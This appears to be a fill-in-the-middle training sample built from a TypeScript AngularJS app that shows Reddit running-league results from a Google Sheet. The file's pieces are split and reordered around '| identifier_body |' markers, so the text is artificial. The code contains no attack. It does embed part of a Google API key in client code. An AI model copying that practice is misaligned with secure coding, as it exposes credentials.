if (!divisions.find(d => d.name.toLowerCase() == user.division.toLowerCase())) {
divisions.push({
name: user.division,
users: []
});
}
let division = divisions.find(d => d.name.toLowerCase() == user.division.toLowerCase());
division.users.push(user);
}
}
private mergeEventsUsers() {
// first merge any events into the users
for (let evt of this.Events) {
for (let user of this.Users) {
// add DNS events to every user for events they didn't do
if (!user.results.find(r => r.event.toLowerCase() == evt.name.toLowerCase())) {
user.results.push({
event: evt.name,
times: evt.events.split(',').map(race => (<MUserRaceResult>{
race: race,
username: user.user,
division: user.division,
note: 'DNS'
}))
})
}
}
}
// then merge user results into the events
for (let user of this.Users) {
for (let result of user.results) {
let evt = this.Events.find(e => e.name.toLowerCase() == result.event.toLowerCase());
if (evt) {
for (let time of result.times) {
let evtResult = evt.results.find(r => r.race.toLowerCase() == time.race.toLowerCase());
evtResult.times.push(time);
if (!evtResult.divisions.find(d => d.race.toLowerCase() == time.race.toLowerCase()
&& d.name.toLowerCase() == time.division.toLowerCase()))
{
evtResult.divisions.push({
name: time.division,
race: time.race,
points: null,
athletes: 0,
note: null,
place: null
});
}
}
}
}
}
}
async listEvents(): Promise<MEvent[]> {
await this.build();
return this.Events;
}
async listUsers(): Promise<MUser[]> {
await this.build();
return this.Users;
}
async listDivisions(): Promise<MDivision[]> {
await this.build();
return this.Divisions;
}
}
/**
* Container for the events, logic for what's next etc
*/
class Events {
static $inject = ['$http', '$q', 'Google'];
private events: Array<MEvent> = [];
constructor(public $http: angular.IHttpService,
public $q: angular.IQService,
public google: GoogleSvc) { }
async list(): Promise<Array<MEvent>> {
if (this.events && this.events.length) { return this.events; }
this.events = await this.google.listEvents();
this.events = _.orderBy(this.events, e => e.date);
return this.events;
}
async get(eventName: string): Promise<MEvent> {
let events = await this.list();
return events.find(x => x.name.replace(/\s+/g, '').toLowerCase() == eventName.replace(/\s+/g, '').toLowerCase());
}
async latest() {
let events = await this.list();
if (events.length == 1) {
return events[0];
}
if (events[events.length- 2]) {
let date = moment(events[events.length - 2].date).format('YYYY-MM-DD');
if (moment().format('YYYY-MM-DD') == date) {
return events[events.length - 2];
}
}
return events[events.length - 1];
}
async next() {
let events = await this.list();
if (events.length == 1) {
return events[0];
}
let active = events.find(e => !!e.submit);
if (active) { return active; }
let next = events[events.length - 1];
for (let ii = events.length - 1; ii >= 0; ii--) {
if (moment(events[ii].date) >= moment().startOf('day')) {
next = events[ii];
}
}
return next;
}
}
/**
* Container for users, logic for age grading etc
*/
class Users {
users: MUser[] = [];
static $inject = ['Google', 'TimeService', 'AgeService'];
constructor(public google: GoogleSvc, public timeSvc: TimeService, public ageSvc: AgeService) {}
async list() {
if (this.users.length) { return this.users; }
this.users = await this.google.listUsers();
for (let user of this.users) {
for (let result of user.results) {
for (let time of result.times) {
time.time_number = this.timeSvc.toNumber(time.time);
time.age_graded_time_number = this.ageSvc.ageGrade(time.race, user.age, user.sex, time.time_number, user.user);
time.age_graded_time = this.timeSvc.toString(time.age_graded_time_number);
time.percent_world_record = this.ageSvc.percentGrade(time.race, user.sex, time.age_graded_time_number, user.user);
}
}
}
return this.users;
}
}
/**
* Container for divisions
*/
class Divisions {
divisions: MDivision[] = [];
static $inject = ['Google'];
constructor(private google: GoogleSvc) {}
async list() {
if (this.divisions.length) { return this.divisions; }
this.divisions = await this.google.listDivisions();
return this.divisions;
}
}
/**
* Does the bulk of the calculations for results, division grouping and scoring
*/
class Results {
results: MEvent[];
static $inject = ['Events', 'Users', 'Divisions'];
constructor(private Events: Events,
private Users: Users,
private Divisions: Divisions) {}
async calculate() {
if (this.results) { return this.results; }
let events = await this.Events.list();
let users = await this.Users.list();
let divisions = await this.Divisions.list();
this.score(events);
console.log({events})
this.results = events;
return this.results;
}
score(events: MEvent[]) {
for (let event of events) {
for (let race of event.results) {
let divs = _.keyBy(race.divisions, d => d.name.toLowerCase());
race.times = _.orderBy(race.times, [t => t.percent_world_record, t => t.time_number, t => t.username], ['desc', 'asc', 'asc']);
let place = 1;
for (let time of race.times) {
if (time.time) {
time.place = place++;
let divname = time.division.toLowerCase();
divs[divname].athletes += 1;
if (divs[divname].athletes <= 5) {
time.points = time.place;
divs[divname].points += time.place;
}
}
else {
time.points = null;
}
}
race.divisions = _.orderBy(race.divisions, [d => d.athletes >= 5 ? -1 : 1, d => d.points]);
place = 1;
for (let div of race.divisions) {
if (div.athletes >= 5) {
div.place = place++;
} else {
div.note = "DQ (Not enough finishers)";
}
}
}
}
}
async getEventResults(name: string) {
await this.calculate();
return this.results.find(x => x.name.replace(/\s+/g, '').toLowerCase() == name.replace(/\s+/g, '').toLowerCase());
}
}
/**
* Default page calendar view
*/
class Calendar {
static $inject = ['$http', 'Events'];
events: Array<MEvent> = [];
constructor (public $http: angular.IHttpService, public Events: Events) {
this.init();
}
async init() {
this.events = [];
let evts = await this.Events.list();
for (let evt of evts) {
evt = _.clone(evt);
evt.date = moment(evt.date).format('MMM D, YYYY');
this.events.push(evt);
}
}
}
/**
* Main controller loaded at start
*/
class MainController {
public isMobile: boolean;
public autoplay: boolean;
public events: Array<MEvent> = [];
public next: MEvent;
public autoplayKey: string;
public lastState: string;
public crumbs: BreadCrumb[] = [];
static $inject = ['$http', '$location', '$timeout', '$state', 'Events', '$sce'];
constructor(public $http: angular.IHttpService,
public $location: angular.ILocationService,
public $timeout: angular.ITimeoutService,
public $state: ng.ui.IStateService,
public Events: Events,
public $sce: angular.ISCEService)
{
this.autoplay = localStorage.getItem('autoplay2020') === null ? true : localStorage.getItem('autoplay2020') == 'true';
this.isMobile = isMobile();
this.autoplayKey = 'autoplay' + moment().year();
this.init();
}
async init() {
let [evts, evt] = await Promise.all([this.Events.list(), this.Events.next()]);
this.events = evts;
this.next = <MEvent>{
name: evt.name.toUpperCase(),
date: moment(evt.date),
state: evt.state,
displayDate: moment(evt.date).format('MMM D, YYYY'),
submit: evt.submit,
live: false
};
this.countdown();
}
countdown() {
if (this.next) {
let now = moment();
let evt = moment(this.next.date);
if (now.format('YYYY-MM-DD') === evt.format('YYYY-MM-DD')) {
this.next.live = true;
} else if (this.next.submit) {
this.next.live = true;
} else {
let days = evt.diff(now, 'days');
this.next.days = days;
evt.subtract(days, 'days');
let hours = evt.diff(now, 'hours');
this.next.hours = hours;
evt.subtract(hours, 'hours');
let minutes = evt.diff(now, 'minutes');
this.next.minutes = minutes;
}
this.$timeout(() => this.countdown(), 1000 * 60);
} else {
this.$timeout(() => this.countdown(), 500);
}
}
getBreadcrumbs() {
if (this.$state.current.name === this.lastState) {
return this.crumbs;
}
this.lastState = this.$state.current.name;
this.crumbs = [];
if (this.lastState !== 'Calendar') {
this.crumbs = [
{name: 'Home', last: false, link: 'Calendar'},
{name: this.lastState, last: true}
];
} else {
this.crumbs = [
{name: 'Home', last: true}
];
}
return this.crumbs;
}
stopAutoplay() {
localStorage.setItem(this.autoplayKey, 'false');
this.autoplay = false;
}
startAutoplay() {
localStorage.setItem(this.autoplayKey, 'true');
this.autoplay = true;
}
shouldAutoplay() {
let ap = localStorage.getItem(this.autoplayKey);
return !(ap === 'false');
}
getThemeUrl() |
}
/**
* Individual event controller for event results pages
*/
class EventController {
tab: string = 'results';
hasRelay: boolean = false;
event: MEvent;
static $inject = ['$http', '$state', '$timeout', '$location', '$anchorScroll',
'$stateParams', 'Events', 'Results'];
constructor(private $http: angular.IHttpService,
private $state: ng.ui.IStateService,
private $timeout: angular.ITimeoutService,
private $location: angular.ILocationService,
private $anchorScroll: angular.IAnchorScrollService,
private $params: ng.ui.IStateParamsService,
private Events: Events,
private Results: Results)
{
this.$anchorScroll.yOffset = 60;
this.init();
}
async init() {
if (this.$params.tab) {
this.tab = this.$params.tab;
}
let eventName = this.$state.current.name;
this.event = await this.Results.getEventResults(eventName);
console.log({event: this.event});
this.$timeout(this.$anchorScroll);
}
changeTab(tab: string) {
this.tab = tab;
this.$state.go(this.$state.current.name, {tab});
}
}
/**
* AgeService
* Manages age grading calculations. Defaults to no grade.
*/
interface Grade {
id: string;
event: string;
isRoad: boolean;
mf: Sex;
age: number;
factor: number;
}
type Sex = 'F'|'M';
class AgeService {
static GRADES: {[mfEventId: string]: {[age: number]: Grade}} = {};
static COLS = {
MFEVENTID : 0,
EVENTID: 1,
ISROAD: 2,
DISTANCE_KM: 3,
WORLD_RECORD_SEC: 4,
AGE_START: 5
};
static WORLD_RECORD = 'World Record';
static parse(file: string) {
let COL = AgeService.COLS;
let lines = file.split('\n');
for (let line of lines) {
if (!line.trim()) { continue; }
let parts = line.split('\t');
if (parts[0] == 'Event') { continue; }
// set up base object
let grade: Partial<Grade> = {
event: parts[COL.EVENTID],
isRoad: parts[COL.ISROAD] == '1',
mf: <Sex>parts[COL.MFEVENTID].substr(0)
};
let id = parts[COL.MFEVENTID];
if (!AgeService.GRADES[id]) { AgeService.GRADES[id] = {}; }
// assign world record
AgeService.GRADES[id][AgeService.WORLD_RECORD] = <Grade>Object.assign({record: parseFloat(parts[COL.WORLD_RECORD_SEC])});
// assign age groups
let START = COL.AGE_START;
for (let ii = START; ii < parts.length - 1; ii++) {
let age = ii + 1;
let factor = parseFloat(parts[ii]);
AgeService.GRADES[id][age] = <Grade>Object.assign({age, factor, id}, grade);
}
}
console.log(AgeService.GRADES)
}
ageGrade(event: string, age: number, sex: Sex, seconds: number, username?: string): number {
if (!seconds) { return seconds; }
if (!sex) { sex = 'M'; }
event = event.replace(/\s/g, '');
let mfEventId = `${sex}${event}`;
let gradedTime = seconds;
let factor = 1;
if (AgeService.GRADES[mfEventId]) {
let mfEvent = AgeService.GRADES[mfEventId];
if (mfEvent[age]) {
factor = mfEvent[age].factor;
gradedTime = seconds * factor;
}
}
console.log(`${username} ${mfEventId} age:${age} time:${seconds} factor:${factor} graded:${gradedTime}`)
return gradedTime;
}
percentGrade(event: string, sex: Sex, seconds: number, username?: string): number {
if (!seconds) { return 0; }
if (!sex) { sex = 'M'; }
event = event.replace(/\s/g, '');
let percent = 0;
let wr;
let mfEventId = `${sex}${event}`;
if (AgeService.GRADES[mfEventId]) {
let mfEvent = AgeService.GRADES[mfEventId];
wr = mfEvent[AgeService.WORLD_RECORD];
percent = wr.record / seconds;
}
console.log(`${username} ${mfEventId} time:${seconds} WR:${wr?.record} percent:${percent}`);
return percent;
}
}
/**
* TimeService
* Time calculations -> string to number / number to string
*/
class TimeService {
toString(time: number): string {
if (!time) { return null; }
let hours = Math.floor(time / (60 * 60));
time = time - (hours * 60 * 60);
let minutes = Math.floor(time / 60);
time = time - (minutes * 60);
let seconds = time.toFixed(1);
let secondsNum = time;
if (hours) {
return `${hours}:${_.padStart(minutes+'',2,'0')}:${(secondsNum < 10 ? '0' : '') + seconds}`;
} else {
return `${minutes}:${(secondsNum < 10 ? '0' : '') + seconds}`;
}
}
toNumber(time: string): number {
if (!time) { return null; }
let parts = time.split(':').map(t => parseFloat(t));
if (parts.length == 3) {
return parts[0]*60*60 + parts[1]*60 + parseFloat(''+parts[2]);
} else {
return parts[0]*60 + parseFloat(''+parts[1]);
}
}
}
function promiseFix($rootScope) {
// await fix -- runs a digest manually on await because it doesn't naturally
Promise = ((Promise) => {
const NewPromise = function (fn) {
const promise = new Promise(fn);
promise.then((value) => {
$rootScope.$applyAsync();
return value;
}, (err) => {
$rootScope.$applyAsync();
throw err;
});
return promise;
};
// Clone the prototype
NewPromise.prototype = Promise.prototype;
// Clone all writable instance properties
for (const propertyName of Object.getOwnPropertyNames(Promise)) {
const propertyDescription = Object.getOwnPropertyDescriptor(Promise, propertyName);
if (propertyDescription.writable) {
NewPromise[propertyName] = Promise[propertyName];
}
}
return NewPromise;
})(Promise) as any;
}
function preload($http, $stateRegistry, $urlRouter, Events: Events, ageSvc: AgeService, google: GoogleSvc) {
return google.load().then(() => {
return Promise.all([
Events.list()
.then(evts => {
for (let evt of evts) {
let state = {
name: evt.state,
templateUrl: `${BASE}event.html`,
controller: 'event',
url: evt.url + "?tab",
params: {
tab: {dynamic: true}
},
controllerAs: 'EC'
};
$stateRegistry.register(state);
}
// after registering states, listen on the router
$urlRouter.sync();
$urlRouter.listen();
}),
$http.get(`${BASE}age-grade.txt`)
.then(x => x.data)
.then(data => {
AgeService.parse(data);
})
]);
});
}
angular
.module('ar', ['ui.router'])
.config(['$stateProvider', '$sceDelegateProvider', '$urlRouterProvider', '$locationProvider', function ($sp, $sce, $url, $loc) {
$sce.resourceUrlWhitelist([
'self',
`${BASE}**`
]);
$url.deferIntercept();
$sp.state({
name: 'Calendar',
templateUrl: `${BASE}calendar.html`,
controller: 'calendar',
url: '/calendar',
controllerAs: 'CC'
});
$sp.state({
name: 'Leaderboard',
templateUrl: `${BASE}leaderboard.html`,
controller: 'leaderboard',
url: '/leaderboard',
controllerAs: 'LC'
});
$url.otherwise('/calendar');
}])
.run(['$rootScope', promiseFix])
.run(['$http', '$stateRegistry', '$urlRouter', 'Events', 'AgeService', 'Google', preload])
.service('Google', GoogleSvc)
.service('Events', Events)
.service('Users', Users)
.service('Divisions', Divisions)
.service('AgeService', AgeService)
.service('TimeService', TimeService)
.service('Results', Results)
.controller('calendar', Calendar)
.controller('main', MainController)
.controller('event', EventController)
.directive('fixedTop', ['$window', function ($window) {
return {
restrict: 'A',
link: function (scope, elem, attrs, ctrl) {
let $win = angular.element($window);
let fixed = parseInt(attrs.fixedTop) || 50;
$win.on('scroll', e => {
let width = Math.max(window.innerWidth, document.documentElement.clientWidth);
if (width < 550 || $window.pageYOffset < fixed) {
elem.css({position: 'relative', top: '' });
} else {
elem.css({position: 'relative', top: ($window.pageYOffset - fixed) + 'px' });
}
});
}
};
}])
.filter('percent', ['$filter', function($filter) {
return function(input, decimals = 1) {
return $filter('number')(input * 100, decimals) + '%';
};
}]);
| {
let ap = this.shouldAutoplay();
return this.$sce.trustAsResourceUrl(`https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/460111206&auto_play=${ap}&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true`);
} | identifier_body |
mooseleague_ts.ts |
// to prevent this loading twice in dev - hacky hacky whatever shut your face
// if (!window['apploaded']) {
// window['apploaded'] = true;
// throw "Already loaded";
// }
declare var byx;
declare var lmw;
interface MEvent {
name: string;
url: string;
date: string|Date|moment.Moment;
state: string;
events: string;
link: string;
submit: string;
editLink: string;
displayDate: string;
live?: boolean;
days?: number;
hours?: number;
minutes?: number;
results: MEventRaceResults[];
}
interface MEventRaceResults {
race: string;
divisions: MDivisionRaceResult[];
times: MUserRaceResult[];
}
interface MUser {
user: string;
link: string;
age: number;
sex: Sex;
division: string;
results: MUserEventResult[];
}
interface MUserEventResult {
event: string;
times: MUserRaceResult[];
}
interface MUserRaceResult {
username: string;
race: string;
time: string;
time_number: number;
age_graded_time: string;
age_graded_time_number: number;
percent_world_record: number;
note: string;
sex: Sex;
links: MLink[];
place: number;
points: number;
division: string;
}
interface MDivision {
name: string;
users: Array<MUser>;
}
interface MDivisionRaceResult {
name: string;
race: string;
points: number;
athletes: number;
note: string;
place: number;
}
interface MLink {
type: string;
url: string;
favicon: string;
}
interface BreadCrumb {
name: string;
last: boolean;
link?: string;
}
let BASE = 'https://jgr3go.github.io/reddit_ar/mooseleague/';
if (window.location.href.match(/localhost/)) {
BASE = '';
}
let GAPI = new Promise((resolve, reject) => {
gapi.load('client', {
callback: async () => {
// this isn't great, but the apikey should be limited to very specific things
await gapi.client.init({apiKey: `${byx}1XThhfQZLh6YcTKwLz${lmw}`});
resolve();
}
});
});
function isMobile() {
return !!(navigator.userAgent.match(/Android/i) ||
navigator.userAgent.match(/webOS/i) ||
navigator.userAgent.match(/iPhone/i) ||
navigator.userAgent.match(/iPad/i) ||
navigator.userAgent.match(/iPod/i) ||
navigator.userAgent.match(/BlackBerry/i) ||
navigator.userAgent.match(/Windows Phone/i));
}
function stripDivision(div: string) {
if (div.includes("(")) {
return div.substr(0, div.indexOf("("));
}
return div;
}
/**
* Loads google sheet and does most of the processing into raw data objects
*/
class GoogleSvc {
private spreadsheet: gapi.client.sheets.Spreadsheet;
private Events: Array<MEvent> = [];
private Users: Array<MUser> = [];
private Divisions: Array<MDivision> = [];
private built: boolean = false;
private loading: Promise<any>;
public USER_COLUMNS = {
TIMESTAMP: 0,
USERNAME: 1,
DIVISION: 2,
AGE: 3,
SEX: 4,
RESULT: 5,
NOTES: 6,
LINKS: 7
};
private async ready() {
if (this.loading) { return await this.loading; }
this.loading = new Promise(async (resolve, reject) => {
try {
await GAPI;
await gapi.client.load('sheets', 'v4');
let sheet = await gapi.client.sheets.spreadsheets.get({
spreadsheetId: '1ZC7pDg9VRiqnd4-w15LUSWcvQXti62IOSp0dcYj2JZI',
includeGridData: true
});
console.log(sheet.result);
this.spreadsheet = sheet.result;
resolve();
} catch (e) {
reject(e);
}
});
}
async load() {
await this.getSpreadsheet();
}
private async getSpreadsheet(): Promise<gapi.client.sheets.Spreadsheet> {
if (this.spreadsheet) { return this.spreadsheet; }
await this.ready();
return this.spreadsheet;
}
private async build() {
if (this.built) { return; }
await this.getSpreadsheet();
this.buildEvents();
this.buildUsers();
this.buildDivisions();
this.mergeEventsUsers();
this.built = true;
}
private buildEvents() {
let events: MEvent[] = [];
for (let sheet of this.spreadsheet.sheets) {
let evt: MEvent = <MEvent>{};
evt.name = sheet.properties.title;
let data = sheet.data[0];
if (!data || !data.rowData) { continue; }
for (let row of data.rowData) {
if (!row.values || !row.values.length) { continue; }
if (!row.values[1]?.formattedValue) { continue; }
switch (row.values[0]?.formattedValue) {
case 'Event':
evt.events = row.values[1]?.formattedValue;
break;
case 'Date':
evt.date = moment(row.values[1]?.formattedValue).year(moment().year());
evt.displayDate = moment(evt.date).format('MMM D, YYYY');
break;
case 'Results':
evt.link = row.values[1]?.formattedValue;
break;
case 'Form':
evt.submit = row.values[1]?.formattedValue;
break;
default:
break;
}
evt.state = evt.name;
evt.url = `/${ evt.name.split(' ').join('').toLowerCase()}`;
evt.editLink = `${this.spreadsheet.spreadsheetUrl}#gid=${sheet.properties.sheetId}`;
evt.results = evt.events.split(',').map(e => {
return {
race: e,
divisions: [],
times: []
};
});
}
events.push(evt);
}
this.Events = events;
}
private | () {
let users: MUser[] = [];
let COL = this.USER_COLUMNS;
for (let sheet of this.spreadsheet.sheets) {
let eventName = sheet.properties.title;
let raceName: string;
let data = sheet.data[0];
if (!data || !data.rowData) { continue; }
let startUserRows = false;
for (let row of data.rowData) {
if (!row.values || !row.values.length) { continue; }
if (!startUserRows) {
if (row.values[0]?.formattedValue == 'Event') {
raceName = row.values[1]?.formattedValue;
}
if (row.values[COL.USERNAME]?.formattedValue == 'Username') {
startUserRows = true;
}
} else {
let username = row.values[COL.USERNAME]?.formattedValue || "";
if (!username) { break; }
// first time finding user, add to master list
if (!users.find(u => u.user.toLowerCase() == username.toLowerCase())) {
let user: Partial<MUser> = {
user: username,
division: stripDivision(row.values[COL.DIVISION]?.formattedValue || ""),
age: parseInt(row.values[COL.AGE]?.formattedValue) || null,
sex: <Sex>row.values[COL.SEX]?.formattedValue?.substr(0,1).toUpperCase(),
results: []
};
user.link = `https://reddit.com/u/${user.user}`;
users.push(<MUser>user);
}
let user = users.find(u => u.user.toLowerCase() == username.toLowerCase());
let time = row.values[COL.RESULT]?.formattedValue;
if (time?.substr(0, 1) == "'") {
time = time.substr(1);
}
user.results.push({
event: eventName,
times: raceName.split(',').map(r => {
return <MUserRaceResult>{
race: r,
username: user.user,
division: user.division,
sex: user.sex,
time: time,
note: row.values[COL.NOTES]?.formattedValue,
links: row.values[COL.LINKS]?.formattedValue?.split(',').map(link => {
return <MLink>{
type: this.getLinkType(link),
favicon: this.getFavicon(link),
url: link
}
})
};
})
});
}
}
}
this.Users = users;
}
private getLinkType(link: string) {
if (link.match(/strava/)) { return 'strava'; }
if (link.match(/youtu/)) { return 'youtube'; }
if (link.match(/redd/)) { return 'reddit'; }
return '';
}
private getFavicon(link: string) {
let match = link.match(/(https?\:\/\/[^\/]+)/);
if (!match) { return 'https://google.com/favicon.ico'; }
let root = match[1].trim();
if (root.substr(0, 4) != "http") {
root = `http://${root}`;
}
return `${root}/favicon.ico`;
}
private buildDivisions() {
let divisions: MDivision[] = [];
for (let user of this.Users) {
if (!divisions.find(d => d.name.toLowerCase() == user.division.toLowerCase())) {
divisions.push({
name: user.division,
users: []
});
}
let division = divisions.find(d => d.name.toLowerCase() == user.division.toLowerCase());
division.users.push(user);
}
}
private mergeEventsUsers() {
// first merge any events into the users
for (let evt of this.Events) {
for (let user of this.Users) {
// add DNS events to every user for events they didn't do
if (!user.results.find(r => r.event.toLowerCase() == evt.name.toLowerCase())) {
user.results.push({
event: evt.name,
times: evt.events.split(',').map(race => (<MUserRaceResult>{
race: race,
username: user.user,
division: user.division,
note: 'DNS'
}))
})
}
}
}
// then merge user results into the events
for (let user of this.Users) {
for (let result of user.results) {
let evt = this.Events.find(e => e.name.toLowerCase() == result.event.toLowerCase());
if (evt) {
for (let time of result.times) {
let evtResult = evt.results.find(r => r.race.toLowerCase() == time.race.toLowerCase());
evtResult.times.push(time);
if (!evtResult.divisions.find(d => d.race.toLowerCase() == time.race.toLowerCase()
&& d.name.toLowerCase() == time.division.toLowerCase()))
{
evtResult.divisions.push({
name: time.division,
race: time.race,
points: null,
athletes: 0,
note: null,
place: null
});
}
}
}
}
}
}
async listEvents(): Promise<MEvent[]> {
await this.build();
return this.Events;
}
async listUsers(): Promise<MUser[]> {
await this.build();
return this.Users;
}
async listDivisions(): Promise<MDivision[]> {
await this.build();
return this.Divisions;
}
}
/**
* Container for the events, logic for what's next etc
*/
class Events {
static $inject = ['$http', '$q', 'Google'];
private events: Array<MEvent> = [];
constructor(public $http: angular.IHttpService,
public $q: angular.IQService,
public google: GoogleSvc) { }
async list(): Promise<Array<MEvent>> {
if (this.events && this.events.length) { return this.events; }
this.events = await this.google.listEvents();
this.events = _.orderBy(this.events, e => e.date);
return this.events;
}
async get(eventName: string): Promise<MEvent> {
let events = await this.list();
return events.find(x => x.name.replace(/\s+/g, '').toLowerCase() == eventName.replace(/\s+/g, '').toLowerCase());
}
async latest() {
let events = await this.list();
if (events.length == 1) {
return events[0];
}
if (events[events.length- 2]) {
let date = moment(events[events.length - 2].date).format('YYYY-MM-DD');
if (moment().format('YYYY-MM-DD') == date) {
return events[events.length - 2];
}
}
return events[events.length - 1];
}
async next() {
let events = await this.list();
if (events.length == 1) {
return events[0];
}
let active = events.find(e => !!e.submit);
if (active) { return active; }
let next = events[events.length - 1];
for (let ii = events.length - 1; ii >= 0; ii--) {
if (moment(events[ii].date) >= moment().startOf('day')) {
next = events[ii];
}
}
return next;
}
}
/**
* Container for users, logic for age grading etc
*/
class Users {
users: MUser[] = [];
static $inject = ['Google', 'TimeService', 'AgeService'];
constructor(public google: GoogleSvc, public timeSvc: TimeService, public ageSvc: AgeService) {}
async list() {
if (this.users.length) { return this.users; }
this.users = await this.google.listUsers();
for (let user of this.users) {
for (let result of user.results) {
for (let time of result.times) {
time.time_number = this.timeSvc.toNumber(time.time);
time.age_graded_time_number = this.ageSvc.ageGrade(time.race, user.age, user.sex, time.time_number, user.user);
time.age_graded_time = this.timeSvc.toString(time.age_graded_time_number);
time.percent_world_record = this.ageSvc.percentGrade(time.race, user.sex, time.age_graded_time_number, user.user);
}
}
}
return this.users;
}
}
/**
* Container for divisions
*/
class Divisions {
divisions: MDivision[] = [];
static $inject = ['Google'];
constructor(private google: GoogleSvc) {}
async list() {
if (this.divisions.length) { return this.divisions; }
this.divisions = await this.google.listDivisions();
return this.divisions;
}
}
/**
* Does the bulk of the calculations for results, division grouping and scoring
*/
class Results {
results: MEvent[];
static $inject = ['Events', 'Users', 'Divisions'];
constructor(private Events: Events,
private Users: Users,
private Divisions: Divisions) {}
async calculate() {
if (this.results) { return this.results; }
let events = await this.Events.list();
let users = await this.Users.list();
let divisions = await this.Divisions.list();
this.score(events);
console.log({events})
this.results = events;
return this.results;
}
score(events: MEvent[]) {
for (let event of events) {
for (let race of event.results) {
let divs = _.keyBy(race.divisions, d => d.name.toLowerCase());
race.times = _.orderBy(race.times, [t => t.percent_world_record, t => t.time_number, t => t.username], ['desc', 'asc', 'asc']);
let place = 1;
for (let time of race.times) {
if (time.time) {
time.place = place++;
let divname = time.division.toLowerCase();
divs[divname].athletes += 1;
if (divs[divname].athletes <= 5) {
time.points = time.place;
divs[divname].points += time.place;
}
}
else {
time.points = null;
}
}
race.divisions = _.orderBy(race.divisions, [d => d.athletes >= 5 ? -1 : 1, d => d.points]);
place = 1;
for (let div of race.divisions) {
if (div.athletes >= 5) {
div.place = place++;
} else {
div.note = "DQ (Not enough finishers)";
}
}
}
}
}
async getEventResults(name: string) {
await this.calculate();
return this.results.find(x => x.name.replace(/\s+/g, '').toLowerCase() == name.replace(/\s+/g, '').toLowerCase());
}
}
/**
* Default page calendar view
*/
class Calendar {
static $inject = ['$http', 'Events'];
events: Array<MEvent> = [];
constructor (public $http: angular.IHttpService, public Events: Events) {
this.init();
}
async init() {
this.events = [];
let evts = await this.Events.list();
for (let evt of evts) {
evt = _.clone(evt);
evt.date = moment(evt.date).format('MMM D, YYYY');
this.events.push(evt);
}
}
}
/**
* Main controller loaded at start
*/
class MainController {
public isMobile: boolean;
public autoplay: boolean;
public events: Array<MEvent> = [];
public next: MEvent;
public autoplayKey: string;
public lastState: string;
public crumbs: BreadCrumb[] = [];
static $inject = ['$http', '$location', '$timeout', '$state', 'Events', '$sce'];
constructor(public $http: angular.IHttpService,
public $location: angular.ILocationService,
public $timeout: angular.ITimeoutService,
public $state: ng.ui.IStateService,
public Events: Events,
public $sce: angular.ISCEService)
{
this.autoplay = localStorage.getItem('autoplay2020') === null ? true : localStorage.getItem('autoplay2020') == 'true';
this.isMobile = isMobile();
this.autoplayKey = 'autoplay' + moment().year();
this.init();
}
async init() {
let [evts, evt] = await Promise.all([this.Events.list(), this.Events.next()]);
this.events = evts;
this.next = <MEvent>{
name: evt.name.toUpperCase(),
date: moment(evt.date),
state: evt.state,
displayDate: moment(evt.date).format('MMM D, YYYY'),
submit: evt.submit,
live: false
};
this.countdown();
}
countdown() {
if (this.next) {
let now = moment();
let evt = moment(this.next.date);
if (now.format('YYYY-MM-DD') === evt.format('YYYY-MM-DD')) {
this.next.live = true;
} else if (this.next.submit) {
this.next.live = true;
} else {
let days = evt.diff(now, 'days');
this.next.days = days;
evt.subtract(days, 'days');
let hours = evt.diff(now, 'hours');
this.next.hours = hours;
evt.subtract(hours, 'hours');
let minutes = evt.diff(now, 'minutes');
this.next.minutes = minutes;
}
this.$timeout(() => this.countdown(), 1000 * 60);
} else {
this.$timeout(() => this.countdown(), 500);
}
}
getBreadcrumbs() {
if (this.$state.current.name === this.lastState) {
return this.crumbs;
}
this.lastState = this.$state.current.name;
this.crumbs = [];
if (this.lastState !== 'Calendar') {
this.crumbs = [
{name: 'Home', last: false, link: 'Calendar'},
{name: this.lastState, last: true}
];
} else {
this.crumbs = [
{name: 'Home', last: true}
];
}
return this.crumbs;
}
stopAutoplay() {
localStorage.setItem(this.autoplayKey, 'false');
this.autoplay = false;
}
startAutoplay() {
localStorage.setItem(this.autoplayKey, 'true');
this.autoplay = true;
}
shouldAutoplay() {
let ap = localStorage.getItem(this.autoplayKey);
return !(ap === 'false');
}
getThemeUrl() {
let ap = this.shouldAutoplay();
return this.$sce.trustAsResourceUrl(`https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/460111206&auto_play=${ap}&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true`);
}
}
/**
* Individual event controller for event results pages
*/
class EventController {
tab: string = 'results';
hasRelay: boolean = false;
event: MEvent;
static $inject = ['$http', '$state', '$timeout', '$location', '$anchorScroll',
'$stateParams', 'Events', 'Results'];
constructor(private $http: angular.IHttpService,
private $state: ng.ui.IStateService,
private $timeout: angular.ITimeoutService,
private $location: angular.ILocationService,
private $anchorScroll: angular.IAnchorScrollService,
private $params: ng.ui.IStateParamsService,
private Events: Events,
private Results: Results)
{
this.$anchorScroll.yOffset = 60;
this.init();
}
async init() {
if (this.$params.tab) {
this.tab = this.$params.tab;
}
let eventName = this.$state.current.name;
this.event = await this.Results.getEventResults(eventName);
console.log({event: this.event});
this.$timeout(this.$anchorScroll);
}
changeTab(tab: string) {
this.tab = tab;
this.$state.go(this.$state.current.name, {tab});
}
}
/**
* AgeService
* Manages age grading calculations. Defaults to no grade.
*/
interface Grade {
id: string;
event: string;
isRoad: boolean;
mf: Sex;
age: number;
factor: number;
}
type Sex = 'F'|'M';
class AgeService {
static GRADES: {[mfEventId: string]: {[age: number]: Grade}} = {};
static COLS = {
MFEVENTID : 0,
EVENTID: 1,
ISROAD: 2,
DISTANCE_KM: 3,
WORLD_RECORD_SEC: 4,
AGE_START: 5
};
static WORLD_RECORD = 'World Record';
static parse(file: string) {
let COL = AgeService.COLS;
let lines = file.split('\n');
for (let line of lines) {
if (!line.trim()) { continue; }
let parts = line.split('\t');
if (parts[0] == 'Event') { continue; }
// set up base object
let grade: Partial<Grade> = {
event: parts[COL.EVENTID],
isRoad: parts[COL.ISROAD] == '1',
mf: <Sex>parts[COL.MFEVENTID].substr(0)
};
let id = parts[COL.MFEVENTID];
if (!AgeService.GRADES[id]) { AgeService.GRADES[id] = {}; }
// assign world record
AgeService.GRADES[id][AgeService.WORLD_RECORD] = <Grade>Object.assign({record: parseFloat(parts[COL.WORLD_RECORD_SEC])});
// assign age groups
let START = COL.AGE_START;
for (let ii = START; ii < parts.length - 1; ii++) {
let age = ii + 1;
let factor = parseFloat(parts[ii]);
AgeService.GRADES[id][age] = <Grade>Object.assign({age, factor, id}, grade);
}
}
console.log(AgeService.GRADES)
}
ageGrade(event: string, age: number, sex: Sex, seconds: number, username?: string): number {
